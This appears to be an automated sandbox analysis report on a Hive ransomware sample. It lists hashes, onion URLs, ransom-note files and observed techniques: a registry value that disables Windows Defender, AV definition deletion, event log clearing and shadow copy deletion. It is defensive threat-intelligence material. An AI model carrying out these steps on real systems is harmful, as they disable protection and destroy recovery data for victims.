Analysis
-
max time kernel
108s -
max time network
15s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
10-01-2022 16:44
Static task
static1
Behavioral task
behavioral1
Sample
213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
Resource
win10-en-20211208
General
-
Target
213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
-
Size
2.5MB
-
MD5
581d017db261422b60eed963c7823566
-
SHA1
6f35892e195de2c569c415a245a3302056bbfa08
-
SHA256
213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc
-
SHA512
c6142d6478d9a02d0269d3121143a64cb7e0a41d35e7924c9ecf7ced739133d847c4aafb9b851e2a9321a054ba3b9c40f00d8e430ad5d19af271ea28fab214f1
Malware Config
Extracted
C:\Program Files\7-Zip\a84r_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2108 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exedescription ioc process File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\15x15dot.png 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_GCswj2P1ems0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00915_.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_2GlJXVeCzZs0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\VCTRN_01.MID.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_mMPy4xexJtM0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_9B4a1o9JKrM0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_left.png 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15034_.GIF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_F6lSp6z7mdA0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIcon.jpg.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_XZRyG39WxEw0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_LfvYeLAhobw0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_5S6VZCzp0KQ0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_udLz2Ffs6AM0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FEZIP.POC.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_KmcvzaPPUgU0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\1 Top.accdt.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_HUto2gVAhC40.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\es-ES\settings.html 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrdeush.dat 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_H4rUMv19Hvk0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_5oAdghcmIyw0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_PLFZtvkHOLE0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\plugin.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_xdtulbQkOCM0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\18.png 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\es-ES\js\timeZones.js 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\FlickLearningWizard.exe.mui 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_zVveAM2WWOc0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD00155_.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_FA-qPTqKpX80.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0183328.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_reDjZvMBP2w0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR15F.GIF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_R5rV0GIpVrA0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_AXdKsi1SOAA0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_ButtonGraphic.png 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Windows Media Player\Media Renderer\connectionmanager_dmr.xml 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\a84r_HOW_TO_DECRYPT.txt 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_XCamJmOveyg0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_mbC4VpSzT8s0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Common Files\System\ado\msadox28.tlb 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\js\slideShow.js 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00174_.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_ZEXJ8yhoIt00.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0195534.WMF.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_0vqYk4EWeCQ0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_1xR5fh5p3do0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOC.CFG.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_tTSiXhhrJOY0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_yCcdDh1GoI00.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_G3fLfD2VemE0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\gadget.xml 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Thatch.dotx.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_pBxcQIbp_RE0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\a84r_HOW_TO_DECRYPT.txt 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_BNStNYOut2Q0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_SOE7ahl5eK80.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\StartDeny.scf.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_0lnxq57SPe00.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_C1fi3eE98aM0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote.gpd.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_F4d3zeQw8fw0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SketchPadTestSchema.xml.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_kiLghOIxbE40.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\clock.js 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_IKyQDQO1aqc0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Juneau.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_mdrGcVW4TiQ0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_EZmuCQDH0mI0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Adobe.css.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_bB3cdm6B4Vc0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN010.XML.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_Ray1VIqsaxM0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBHED98.POC.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_Y_5WLahJLGA0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_--tjtl2iRWQ0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.r5kTsznAdeVxREe-gQHeL3RON6nRvVJDfnvXviDbBz3_M8XHMW8G0LA0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1764 vssadmin.exe -
Opens file in notepad (likely ransom note) 2 IoCs
Processes:
NOTEPAD.EXEnotepad.exepid process 2536 NOTEPAD.EXE 2616 notepad.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exe213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exepid process 2140 powershell.exe 2220 powershell.exe 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1356 wevtutil.exe Token: SeBackupPrivilege 1356 wevtutil.exe Token: SeSecurityPrivilege 1884 wevtutil.exe Token: SeBackupPrivilege 1884 wevtutil.exe Token: SeSecurityPrivilege 304 wevtutil.exe Token: SeBackupPrivilege 304 wevtutil.exe Token: SeIncreaseQuotaPrivilege 980 wmic.exe Token: SeSecurityPrivilege 980 wmic.exe Token: SeTakeOwnershipPrivilege 980 wmic.exe Token: SeLoadDriverPrivilege 980 wmic.exe Token: SeSystemProfilePrivilege 980 wmic.exe Token: SeSystemtimePrivilege 980 wmic.exe Token: SeProfSingleProcessPrivilege 980 wmic.exe Token: SeIncBasePriorityPrivilege 980 wmic.exe Token: SeCreatePagefilePrivilege 980 wmic.exe Token: SeBackupPrivilege 980 wmic.exe Token: SeRestorePrivilege 980 wmic.exe Token: SeShutdownPrivilege 980 wmic.exe Token: SeDebugPrivilege 980 wmic.exe Token: SeSystemEnvironmentPrivilege 980 wmic.exe Token: SeRemoteShutdownPrivilege 980 wmic.exe Token: SeUndockPrivilege 980 wmic.exe Token: SeManageVolumePrivilege 980 wmic.exe Token: 33 980 wmic.exe Token: 34 980 wmic.exe Token: 35 980 wmic.exe Token: SeIncreaseQuotaPrivilege 1308 wmic.exe Token: SeSecurityPrivilege 1308 wmic.exe Token: SeTakeOwnershipPrivilege 1308 wmic.exe Token: SeLoadDriverPrivilege 1308 wmic.exe Token: SeSystemProfilePrivilege 1308 wmic.exe Token: SeSystemtimePrivilege 1308 wmic.exe Token: SeProfSingleProcessPrivilege 1308 wmic.exe Token: SeIncBasePriorityPrivilege 1308 wmic.exe Token: SeCreatePagefilePrivilege 1308 wmic.exe Token: SeBackupPrivilege 1308 wmic.exe Token: SeRestorePrivilege 1308 wmic.exe Token: SeShutdownPrivilege 1308 wmic.exe Token: SeDebugPrivilege 1308 wmic.exe Token: SeSystemEnvironmentPrivilege 1308 wmic.exe Token: SeRemoteShutdownPrivilege 1308 wmic.exe Token: SeUndockPrivilege 1308 wmic.exe Token: SeManageVolumePrivilege 1308 wmic.exe Token: 33 1308 wmic.exe Token: 34 1308 wmic.exe Token: 35 1308 wmic.exe Token: SeIncreaseQuotaPrivilege 1308 wmic.exe Token: SeSecurityPrivilege 1308 wmic.exe Token: SeTakeOwnershipPrivilege 1308 wmic.exe Token: SeLoadDriverPrivilege 1308 wmic.exe Token: SeSystemProfilePrivilege 1308 wmic.exe Token: SeSystemtimePrivilege 1308 wmic.exe Token: SeProfSingleProcessPrivilege 1308 wmic.exe Token: SeIncBasePriorityPrivilege 1308 wmic.exe Token: SeCreatePagefilePrivilege 1308 wmic.exe Token: SeBackupPrivilege 1308 wmic.exe Token: SeRestorePrivilege 1308 wmic.exe Token: SeShutdownPrivilege 1308 wmic.exe Token: SeDebugPrivilege 1308 wmic.exe Token: SeSystemEnvironmentPrivilege 1308 wmic.exe Token: SeRemoteShutdownPrivilege 1308 wmic.exe Token: SeUndockPrivilege 1308 wmic.exe Token: SeManageVolumePrivilege 1308 wmic.exe Token: 33 1308 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 952 wrote to memory of 584 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 584 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 584 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 584 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 584 wrote to memory of 460 584 net.exe net1.exe PID 584 wrote to memory of 460 584 net.exe net1.exe PID 584 wrote to memory of 460 584 net.exe net1.exe PID 584 wrote to memory of 460 584 net.exe net1.exe PID 952 wrote to memory of 696 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 696 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 696 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 696 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 696 wrote to memory of 560 696 net.exe net1.exe PID 696 wrote to memory of 560 696 net.exe net1.exe PID 696 wrote to memory of 560 696 net.exe net1.exe PID 696 wrote to memory of 560 696 net.exe net1.exe PID 952 wrote to memory of 1480 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 1480 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 1480 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 1480 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 1480 wrote to memory of 1364 1480 net.exe net1.exe PID 1480 wrote to memory of 1364 1480 net.exe net1.exe PID 1480 wrote to memory of 1364 1480 net.exe net1.exe PID 1480 wrote to memory of 1364 1480 net.exe net1.exe PID 952 wrote to memory of 520 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 520 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 520 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 520 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 520 wrote to memory of 1704 520 net.exe net1.exe PID 520 wrote to memory of 1704 520 net.exe net1.exe PID 520 wrote to memory of 1704 520 net.exe net1.exe PID 520 wrote to memory of 1704 520 net.exe net1.exe PID 952 wrote to memory of 364 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 364 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 364 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 364 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 364 wrote to memory of 1212 364 net.exe net1.exe PID 364 wrote to memory of 1212 364 net.exe net1.exe PID 364 wrote to memory of 1212 364 net.exe net1.exe PID 364 wrote to memory of 1212 364 net.exe net1.exe PID 952 wrote to memory of 632 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 632 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 632 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 632 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 632 wrote to memory of 1956 632 net.exe net1.exe PID 632 wrote to memory of 1956 632 net.exe net1.exe PID 632 wrote to memory of 1956 632 net.exe net1.exe PID 632 wrote to memory of 1956 632 net.exe net1.exe PID 952 wrote to memory of 1972 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 1972 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 1972 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 1972 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 1972 wrote to memory of 1284 1972 net.exe net1.exe PID 1972 wrote to memory of 1284 1972 net.exe net1.exe PID 1972 wrote to memory of 1284 1972 net.exe net1.exe PID 1972 wrote to memory of 1284 1972 net.exe net1.exe PID 952 wrote to memory of 1544 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 1544 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 1544 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 952 wrote to memory of 1544 952 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 1544 wrote to memory of 1592 1544 net.exe net1.exe PID 1544 wrote to memory of 1592 1544 net.exe net1.exe PID 1544 wrote to memory of 1592 1544 net.exe net1.exe PID 1544 wrote to memory of 1592 1544 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
